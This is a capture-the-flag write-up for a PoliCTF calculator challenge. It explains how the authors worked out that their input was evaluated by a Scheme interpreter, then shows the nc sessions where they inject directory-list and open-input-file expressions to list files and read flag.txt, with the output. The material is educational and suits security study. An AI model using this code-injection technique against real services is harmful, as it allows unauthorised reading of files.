Play with this amazing calculator: calc.challenges.polictf.it:4000
In this challenge, we had to blindly exploit a networked binary in a black box setting. The binary is a calculator that prompts the user for the first number, an operator, and the second number. If the operation was valid it will return the answer else it would hang there.
1337 + 1337 = 2674, sure no problem there. However, some odd calculations we tried tipped us off to the true nature of the calculator.
1 1 1 1 1 1 + 1 looks weird and should fail but it doesnt. It even yields 7 which is 1 + 1 + 1 + 1 + 1 + 1 + 1. The subtraction operation yields an even weirder answer.
However, it was this operation that really revealed that the interpreter was Scheme.
Sweet, #t and #f are values in Scheme representing True and False respectively. Now we can expect that the layout of user supplied values would be (operator first_number second_number) e.g. (+ 1 1). Now we understand how the input is passed to an interpreter, a Scheme interpreter, so let’s craft our attack payload.
Objectives for our attack payload:
- List files on the disk
- Read from file
Listing files may be achieved by the (directory-list) function. Reading from a file may be done by (read (open-input-file “filename”).
Let’s list the files in the current directory:
[email protected]:~$ nc calc.challenges.polictf.it 4000 Write the first number:directory-list Write the operator: Write the second number: (flag.txt challenge)
Great, let’s read flag.txt.
[email protected]:~$ nc calc.challenges.polictf.it 4000 Write the first number:read (open-input-file "flag.txt") Write the operator: Write the second number: cb1228e2387cc12ad30fd4243fc23a0